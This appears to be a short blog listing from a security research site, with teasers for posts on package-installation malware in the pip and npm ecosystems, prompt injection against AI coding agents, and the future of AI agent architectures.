Research notes on AI security, extension risk, and offensive testing.
pip, npm, and lifecycle scripts make package installation a code execution problem. AI coding agents add another prompt-injection surface on top.
A practical take on where AI agents are heading, why current architectures age quickly, and why teams should build for the model curve instead of today's constraints.
![pip install malware: Why Python and JavaScript Package Ecosystems Are [almost] Unfixable](/images/blog/package-ecosystem-malware_hu_5709203f63bdaf1b.webp)
